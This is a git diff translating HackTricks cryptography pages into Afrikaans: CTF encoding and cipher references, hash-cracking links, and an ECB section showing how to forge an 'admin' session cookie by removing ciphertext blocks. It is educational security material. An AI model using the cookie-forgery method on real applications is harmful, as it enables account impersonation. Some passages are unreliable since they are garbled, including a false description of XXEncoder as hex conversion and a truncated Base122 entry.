-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/cryptography/crypto-ctfs-tricks.md b/cryptography/crypto-ctfs-tricks.md index 080613c70..406d8f58c 100644 --- a/cryptography/crypto-ctfs-tricks.md +++ b/cryptography/crypto-ctfs-tricks.md @@ -1,22 +1,22 @@ -# Crypto CTFs Tricks +# Crypto CTFs Truuks
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Online Hashes DBs +## Aanlyn Hash-databasisse -* _**Google it**_ +* _**Google dit**_ * [http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240](http://hashtoolkit.com/reverse-hash?hash=4d186321c1a7f0f354b297e8914ab240) * [https://www.onlinehashcrack.com/](https://www.onlinehashcrack.com) * [https://crackstation.net/](https://crackstation.net) @@ -28,26 +28,26 @@ Other ways to support HackTricks: * [https://hashkiller.co.uk/Cracker/MD5](https://hashkiller.co.uk/Cracker/MD5) * [https://www.md5online.org/md5-decrypt.html](https://www.md5online.org/md5-decrypt.html) -## Magic Autosolvers +## Toveroplossers * [**https://github.com/Ciphey/Ciphey**](https://github.com/Ciphey/Ciphey) -* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic module) +* [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) (Magic-module) * [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * [https://www.boxentriq.com/code-breaking](https://www.boxentriq.com/code-breaking) -## Encoders +## Enkoders -Most of encoded data can be decoded with these 2 ressources: +Die meeste gekodeerde data kan ontsluit word met hierdie 2 hulpbronne: * [https://www.dcode.fr/tools-list](https://www.dcode.fr/tools-list) * [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) -### Substitution Autosolvers +### Substitusie Toveroplossers * [https://www.boxentriq.com/code-breaking/cryptogram](https://www.boxentriq.com/code-breaking/cryptogram) -* [https://quipqiup.com/](https://quipqiup.com) - Very good ! +* [https://quipqiup.com/](https://quipqiup.com) - Baie goed! -#### Caesar - ROTx Autosolvers +#### Caesar - ROTx Toveroplossers * [https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript](https://www.nayuki.io/page/automatic-caesar-cipher-breaker-javascript) @@ -55,97 +55,89 @@ Most of encoded data can be decoded with these 2 ressources: * [http://rumkin.com/tools/cipher/atbash.php](http://rumkin.com/tools/cipher/atbash.php) -### Base Encodings Autosolver +### Basisenkoderings Toveroplossers -Check all these bases with: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) +Kyk na al hierdie basisse met: [https://github.com/dhondta/python-codext](https://github.com/dhondta/python-codext) * **Ascii85** - * `BQ%]q@psCd@rH0l` +* `BQ%]q@psCd@rH0l` * **Base26** \[_A-Z_] - * `BQEKGAHRJKHQMVZGKUXNT` +* `BQEKGAHRJKHQMVZGKUXNT` * **Base32** \[_A-Z2-7=_] - * `NBXWYYLDMFZGCY3PNRQQ====` +* `NBXWYYLDMFZGCY3PNRQQ====` * **Zbase32** \[_ybndrfg8ejkmcpqxot1uwisza345h769_] - * `pbzsaamdcf3gna5xptoo====` +* `pbzsaamdcf3gna5xptoo====` * **Base32 Geohash** \[_0-9b-hjkmnp-z_] - * `e1rqssc3d5t62svgejhh====` +* `e1rqssc3d5t62svgejhh====` * **Base32 Crockford** \[_0-9A-HJKMNP-TV-Z_] - * `D1QPRRB3C5S62RVFDHGG====` +* `D1QPRRB3C5S62RVFDHGG====` * **Base32 Extended Hexadecimal** \[_0-9A-V_] - * `D1NMOOB3C5P62ORFDHGG====` +* `D1NMOOB3C5P62ORFDHGG====` * **Base45** \[_0-9A-Z $%\*+-./:_] - * `59DPVDGPCVKEUPCPVD` +* `59DPVDGPCVKEUPCPVD` * **Base58 (bitcoin)** \[_1-9A-HJ-NP-Za-km-z_] - * `2yJiRg5BF9gmsU6AC` +* `2yJiRg5BF9gmsU6AC` * **Base58 (flickr)** \[_1-9a-km-zA-HJ-NP-Z_] - * `2YiHqF5bf9FLSt6ac` +* `2YiHqF5bf9FLSt6ac` * **Base58 (ripple)** \[_rpshnaf39wBUDNEGHJKLM4PQ-T7V-Z2b-eCg65jkm8oFqi1tuvAxyz_] - * `pyJ5RgnBE9gm17awU` +* `pyJ5RgnBE9gm17awU` * **Base62** \[_0-9A-Za-z_] - * `g2AextRZpBKRBzQ9` +* `g2AextRZpBKRBzQ9` * **Base64** \[_A-Za-z0-9+/=_] - * `aG9sYWNhcmFjb2xh` +* `aG9sYWNhcmFjb2xh` * **Base67** \[_A-Za-z0-9-_.!\~\_] - * `NI9JKX0cSUdqhr!p` +* `NI9JKX0cSUdqhr!p` * **Base85 (Ascii85)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - * `BQ%]q@psCd@rH0l` +* `BQ%]q@psCd@rH0l` * **Base85 (Adobe)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - * `<~BQ%]q@psCd@rH0l~>` +* `<~BQ%]q@psCd@rH0l~>` * **Base85 (IPv6 or RFC1924)** \[_0-9A-Za-z!#$%&()\*+-;<=>?@^_\`{|}\~\_] - * `Xm4y`V\_|Y(V{dF>\` +* `Xm4y`V\_|Y(V{dF>\` * **Base85 (xbtoa)** \[_!"#$%&'()\*+,-./0-9:;<=>?@A-Z\[\\]^\_\`a-u_] - * `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` +* `xbtoa Begin\nBQ%]q@psCd@rH0l\nxbtoa End N 12 c E 1a S 4e6 R 6991d` * **Base85 (XML)** \[_0-9A-Za-y!#$()\*+,-./:;=?@^\`{|}\~z\__] - * `Xm4y|V{~Y+V}dF?` +* `Xm4y|V{~Y+V}dF?` * **Base91** \[_A-Za-z0-9!#$%&()\*+,./:;<=>?@\[]^\_\`{|}\~"_] - * `frDg[*jNN!7&BQM` +* `frDg[*jNN!7&BQM` * **Base100** \[] - * `👟👦👣👘👚👘👩👘👚👦👣👘` +* `👟👦👣👘👚👘👩👘👚👦👣👘` * **Base122** \[] - * `4F ˂r0Xmvc` -* **ATOM-128** \[_/128GhIoPQROSTeUbADfgHijKLM+n0pFWXY456xyzB7=39VaqrstJklmNuZvwcdEC_] - * `MIc3KiXa+Ihz+lrXMIc3KbCC` -* **HAZZ15** \[_HNO4klm6ij9n+J2hyf0gzA8uvwDEq3X1Q7ZKeFrWcVTts/MRGYbdxSo=ILaUpPBC5_] - * `DmPsv8J7qrlKEoY7` +* `4F +* `DmPsv8J7qrlKEoY7` * **MEGAN35** \[_3G-Ub=c-pW-Z/12+406-9Vaq-zA-F5_] - * `kLD8iwKsigSalLJ5` +* `kLD8iwKsigSalLJ5` * **ZONG22** \[_ZKj9n+yf0wDVX1s/5YbdxSo=ILaUpPBCHg8uvNO4klm6iJGhQ7eFrWczAMEq3RTt2_] - * `ayRiIo1gpO+uUc7g` +* `ayRiIo1gpO+uUc7g` * **ESAB46** \[] - * `3sHcL2NR8WrT7mhR` +* `3sHcL2NR8WrT7mhR` * **MEGAN45** \[] - * `kLD8igSXm2KZlwrX` +* `kLD8igSXm2KZlwrX` * **TIGO3FX** \[] - * `7AP9mIzdmltYmIP9mWXX` +* `7AP9mIzdmltYmIP9mWXX` * **TRIPO5** \[] - * `UE9vSbnBW6psVzxB` +* `UE9vSbnBW6psVzxB` * **FERON74** \[] - * `PbGkNudxCzaKBm0x` +* `PbGkNudxCzaKBm0x` * **GILA7** \[] - * `D+nkv8C1qIKMErY1` +* `D+nkv8C1qIKMErY1` * **Citrix CTX1** \[] - * `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` +* `MNGIKCAHMOGLKPAKMMGJKNAINPHKLOBLNNHILCBHNOHLLPBK` -[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +[http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html](http://k4.cba.pl/dw/crypo/tools/eng\_atom128c.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### HackerizeXS \[_╫Λ↻├☰┏_] - ``` ╫☐↑Λ↻Λ┏Λ↻☐↑Λ ``` - -* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dead: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) +* [http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) - 404 Dood: [https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html](https://web.archive.org/web/20190228181208/http://k4.cba.pl/dw/crypo/tools/eng\_hackerize.html) ### Morse - ``` .... --- .-.. -.-. .- .-. .- -.-. --- .-.. .- ``` - -* [http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/eng\_morse-encode.html) - 404 Dead: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) +* [http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html](http://k4.cba.pl/dw/crypo/tools/af\_morse-encode.html) - 404 Dood: [https://gchq.github.io/CyberChef/](https://gchq.github.io/CyberChef/) ### UUencoder - ``` begin 644 webutils_pl M2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%( @@ -154,129 +146,117 @@ F3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$%(3TQ!2$],04A/3$$` ` end ``` - * [http://www.webutils.pl/index.php?idx=uu](http://www.webutils.pl/index.php?idx=uu) -### XXEncoder +### XXKoder +XXEncoder is a simple encoding technique that converts ASCII characters to their hexadecimal representation. It is commonly used to obfuscate data or bypass certain security measures. To decode the encoded data, you can use an online XXDecoder tool or write a custom script. Keep in mind that XXEncoder is a basic encoding method and may not provide strong security. ``` begin 644 webutils_pl hG2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236Hol-G2xAEIVDH236 5Hol-G2xAEE++ end ``` - * [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) ### YEncoder +* [www.webutils.pl/index.php?idx=xx](https://github.com/carlospolop/hacktricks/tree/bf578e4c5a955b4f6cdbe67eb4a543e16a3f848d/crypto/www.webutils.pl/index.php?idx=xx) + +### YEncoder ``` =ybegin line=128 size=28 name=webutils_pl ryvkryvkryvkryvkryvkryvkryvk =yend size=28 crc32=35834c86 ``` - * [http://www.webutils.pl/index.php?idx=yenc](http://www.webutils.pl/index.php?idx=yenc) ### BinHex +BinHex is 'n formaat wat gebruik word om binêre lêers te vertaal na 'n teksformaat wat veilig oorgedra kan word. Dit word dikwels gebruik om lêers te omskep vir oordrag oor e-pos of ander kommunikasiekanale wat slegs teks ondersteun. BinHex gebruik 'n spesiale algoritme om die binêre data om te skakel na 'n reeks ASCII-karakters. Hierdie omgesette teks kan dan veilig oorgedra word sonder om data te verloor of te beskadig. BinHex is 'n nuttige hulpmiddel vir die oordra van binêre lêers in 'n veilige en betroubare formaat. ``` (This file must be converted with BinHex 4.0) :#hGPBR9dD@acAh"X!$mr2cmr2cmr!!!!!!!8!!!!!-ka5%p-38K26%&)6da"5%p -38K26%'d9J!!: ``` - * [http://www.webutils.pl/index.php?idx=binhex](http://www.webutils.pl/index.php?idx=binhex) ### ASCII85 +ASCII85 is 'n binêre na teks-koderingsalgoritme wat gebruik word om binêre data om te skakel na 'n teksvorm wat bestaan uit ASCII-karakters. Dit is nuttig vir die oordra van binêre data in 'n teksgebaseerde omgewing, soos e-pos of tekslêers. ASCII85 kodeer elke 4 byte van binêre data na 5 ASCII-karakters. ``` <~85DoF85DoF85DoF85DoF85DoF85DoF~> ``` - * [http://www.webutils.pl/index.php?idx=ascii85](http://www.webutils.pl/index.php?idx=ascii85) -### Dvorak keyboard - +### Dvorak sleutelbord ``` drnajapajrna ``` - -* [https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=en\&page=dvorakKeyboard) +* [https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard](https://www.geocachingtoolbox.com/index.php?lang=af\&page=dvorakKeyboard) ### A1Z26 -Letters to their numerical value - +Briewe na hul numeriese waarde ``` 8 15 12 1 3 1 18 1 3 15 12 1 ``` - ### Affine Cipher Encode -Letter to num `(ax+b)%26` (_a_ and _b_ are the keys and _x_ is the letter) and the result back to letter - +Letter na nommer `(ax+b)%26` (_a_ en _b_ is die sleutels en _x_ is die letter) en die resultaat terug na 'n letter. ``` krodfdudfrod ``` +### SMS Kode -### SMS Code +**Multitap** [vervang 'n letter](https://www.dcode.fr/word-letter-change) deur herhaalde syfers wat gedefinieer word deur die ooreenstemmende sleutelkode op 'n mobiele [foon sleutelbord](https://www.dcode.fr/phone-keypad-cipher) (Hierdie modus word gebruik wanneer SMS'e geskryf word).\ +Byvoorbeeld: 2=A, 22=B, 222=C, 3=D...\ +Jy kan hierdie kode identifiseer omdat jy\*\* verskeie herhaalde syfers\*\* sal sien. -**Multitap** [replaces a letter](https://www.dcode.fr/word-letter-change) by repeated digits defined by the corresponding key code on a mobile [phone keypad](https://www.dcode.fr/phone-keypad-cipher) (This mode is used when writing SMS).\ -For example: 2=A, 22=B, 222=C, 3=D...\ -You can identify this code because you will see\*\* several numbers repeated\*\*. +Jy kan hierdie kode ontsyfer by: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) -You can decode this code in: [https://www.dcode.fr/multitap-abc-cipher](https://www.dcode.fr/multitap-abc-cipher) - -### Bacon Code - -Substitude each letter for 4 As or Bs (or 1s and 0s) +### Bacon Kode +Vervang elke letter met 4 As of Bs (of 1s en 0s) ``` 00111 01101 01010 00000 00010 00000 10000 00000 00010 01101 01010 00000 AABBB ABBAB ABABA AAAAA AAABA AAAAA BAAAA AAAAA AAABA ABBAB ABABA AAAAA ``` - -### Runes +### Rune ![](../.gitbook/assets/runes.jpg) -## Compression +## Saamdruk -**Raw Deflate** and **Raw Inflate** (you can find both in Cyberchef) can compress and decompress data without headers. +**Raw Deflate** en **Raw Inflate** (jy kan beide in Cyberchef vind) kan data saamdruk en ontspan sonder koppe. -## Easy Crypto +## Maklike Kriptografie -### XOR - Autosolver +### XOR - Outomatiese oplosser * [https://wiremask.eu/tools/xor-cracker/](https://wiremask.eu/tools/xor-cracker/) ### Bifid -A keywork is needed - +'n Sleutelwoord is nodig ``` fgaargaamnlunesuneoa ``` - ### Vigenere -A keywork is needed - +'n Sleutelwoord is nodig ``` wodsyoidrods ``` - * [https://www.guballa.de/vigenere-solver](https://www.guballa.de/vigenere-solver) * [https://www.dcode.fr/vigenere-cipher](https://www.dcode.fr/vigenere-cipher) * [https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx](https://www.mygeocachingprofile.com/codebreaker.vigenerecipher.aspx) -## Strong Crypto +## Sterk Kriptografie ### Fernet -2 base64 strings (token and key) - +2 basis64 strings (token en sleutel) ``` Token: gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmCv_fS3_VpjL7HxCz7_Q== @@ -284,19 +264,16 @@ gAAAAABWC9P7-9RsxTz_dwxh9-O2VUB7Ih8UCQL1_Zk4suxnkCvb26Ie4i8HSUJ4caHZuiNtjLl3qfmC Key: -s6eI5hyNh8liH7Gq0urPC-vzPgNnxauKvRO4g03oYI= ``` - * [https://asecuritysite.com/encryption/ferdecode](https://asecuritysite.com/encryption/ferdecode) -### Samir Secret Sharing - -A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). +### Samir Geheime Deling +'n Geheim word in X dele verdeel en om dit te herstel, het jy Y dele nodig (_Y <=X_). ``` 8019f8fa5879aa3e07858d08308dc1a8b45 80223035713295bddf0b0bd1b10a5340b89 803bc8cf294b3f83d88e86d9818792e80cd ``` - [http://christian.gen.co/secrets/](http://christian.gen.co/secrets/) ### OpenSSL brute-force @@ -304,7 +281,7 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_). * [https://github.com/glv2/bruteforce-salted-openssl](https://github.com/glv2/bruteforce-salted-openssl) * [https://github.com/carlospolop/easy\_BFopensslCTF](https://github.com/carlospolop/easy\_BFopensslCTF) -## Tools +## Gereedskap * [https://github.com/Ganapati/RsaCtfTool](https://github.com/Ganapati/RsaCtfTool) * [https://github.com/lockedbyte/cryptovenom](https://github.com/lockedbyte/cryptovenom) @@ -312,14 +289,14 @@ A secret is splitted in X parts and to recover it you need Y parts (_Y <=X_).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
diff --git a/cryptography/electronic-code-book-ecb.md b/cryptography/electronic-code-book-ecb.md index 4ddaf5d47..294c9ddc3 100644 --- a/cryptography/electronic-code-book-ecb.md +++ b/cryptography/electronic-code-book-ecb.md @@ -1,104 +1,94 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
# ECB -(ECB) Electronic Code Book - symmetric encryption scheme which **replaces each block of the clear text** by the **block of ciphertext**. It is the **simplest** encryption scheme. The main idea is to **split** the clear text into **blocks of N bits** (depends on the size of the block of input data, encryption algorithm) and then to encrypt (decrypt) each block of clear text using the only key. +(ECB) Elektroniese Kodeboek - simmetriese enkripsieskema wat elke blok van die duidelike teks vervang deur die blok van die sleutelteks. Dit is die eenvoudigste enkripsieskema. Die hoofidee is om die duidelike teks in blokke van N-bits (afhangende van die grootte van die blok van insetdata, enkripsie-algoritme) te verdeel en dan elke blok van duidelike teks te enkripteer (de-enkripteer) met die enigste sleutel. ![](https://upload.wikimedia.org/wikipedia/commons/thumb/e/e6/ECB_decryption.svg/601px-ECB_decryption.svg.png) -Using ECB has multiple security implications: +Die gebruik van ECB het verskeie veiligheidsimplikasies: -* **Blocks from encrypted message can be removed** -* **Blocks from encrypted message can be moved around** +* **Blokke van die enkripteerde boodskap kan verwyder word** +* **Blokke van die enkripteerde boodskap kan rondgeskuif word** -# Detection of the vulnerability +# Opname van die kwesbaarheid -Imagine you login into an application several times and you **always get the same cookie**. This is because the cookie of the application is **`|`**.\ -Then, you generate to new users, both of them with the **same long password** and **almost** the **same** **username**.\ -You find out that the **blocks of 8B** where the **info of both users** is the same are **equals**. Then, you imagine that this might be because **ECB is being used**. - -Like in the following example. Observe how these** 2 decoded cookies** has several times the block **`\x23U\xE45K\xCB\x21\xC8`** +Stel jou voor jy teken verskeie kere in by 'n toepassing en jy kry **altyd dieselfde koekie**. Dit is omdat die koekie van die toepassing **`|`** is.\ +Dan genereer jy twee nuwe gebruikers, albei met dieselfde lang wagwoord en **byna** dieselfde **gebruikersnaam**.\ +Jy kom agter dat die blokke van 8B waar die inligting van beide gebruikers dieselfde is, **gelyk** is. Jy vermoed dat dit dalk is omdat **ECB gebruik word**. +Soos in die volgende voorbeeld. Let op hoe hierdie **2 gedekodeerde koekies** verskeie kere die blok **`\x23U\xE45K\xCB\x21\xC8`** bevat. ``` \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 \x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8\x04\xB6\xE1H\xD1\x1E \xB6\x23U\xE45K\xCB\x21\xC8\x23U\xE45K\xCB\x21\xC8+=\xD4F\xF7\x99\xD9\xA9 ``` +Dit is omdat die **gebruikersnaam en wagwoord van daardie koekies verskeie kere die letter "a" bevat het** (byvoorbeeld). Die **blokke** wat **verskillend** is, is blokke wat **ten minste 1 verskillende karakter** bevat het (miskien die skeidingsteken "|" of 'n nodige verskil in die gebruikersnaam). -This is because the **username and password of those cookies contained several times the letter "a"** (for example). The **blocks** that are **different** are blocks that contained **at least 1 different character** (maybe the delimiter "|" or some necessary difference in the username). +Nou hoef die aanvaller net te ontdek of die formaat `` of `` is. Om dit te doen, kan hy net **verskeie gebruikersname genereer** met **soortgelyke en lang gebruikersname en wagwoorde** totdat hy die formaat en die lengte van die skeidingsteken vind: -Now, the attacker just need to discover if the format is `` or ``. For doing that, he can just **generate several usernames **with s**imilar and long usernames and passwords until he find the format and the length of the delimiter:** +| Lengte van gebruikersnaam: | Lengte van wagwoord: | Lengte van gebruikersnaam+wagwoord: | Lengte van koekie (na dekodeering): | +| ------------------------- | -------------------- | ----------------------------------- | ----------------------------------- | +| 2 | 2 | 4 | 8 | +| 3 | 3 | 6 | 8 | +| 3 | 4 | 7 | 8 | +| 4 | 4 | 8 | 16 | +| 7 | 7 | 14 | 16 | -| Username length: | Password length: | Username+Password length: | Cookie's length (after decoding): | -| ---------------- | ---------------- | ------------------------- | --------------------------------- | -| 2 | 2 | 4 | 8 | -| 3 | 3 | 6 | 8 | -| 3 | 4 | 7 | 8 | -| 4 | 4 | 8 | 16 | -| 7 | 7 | 14 | 16 | +# Uitbuiting van die kwesbaarheid -# Exploitation of the vulnerability - -## Removing entire blocks - -Knowing the format of the cookie (`|`), in order to impersonate the username `admin` create a new user called `aaaaaaaaadmin` and get the cookie and decode it: +## Verwydering van hele blokke +Met kennis van die formaat van die koekie (`|`), om die gebruikersnaam `admin` na te boots, skep 'n nuwe gebruiker genaamd `aaaaaaaaadmin` en kry die koekie en dekodeer dit: ``` \x23U\xE45K\xCB\x21\xC8\xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` - -We can see the pattern `\x23U\xE45K\xCB\x21\xC8` created previously with the username that contained only `a`.\ -Then, you can remove the first block of 8B and you will et a valid cookie for the username `admin`: - +Ons kan die patroon `\x23U\xE45K\xCB\x21\xC8` sien wat vantevore geskep is met die gebruikersnaam wat slegs `a` bevat.\ +Daarna kan jy die eerste blok van 8B verwyder en jy sal 'n geldige koekie vir die gebruikersnaam `admin` kry: ``` \xE0Vd8oE\x123\aO\x43T\x32\xD5U\xD4 ``` +## Blokke skuif -## Moving blocks +In baie databasisse is dit dieselfde om te soek vir `WHERE username='admin';` of vir 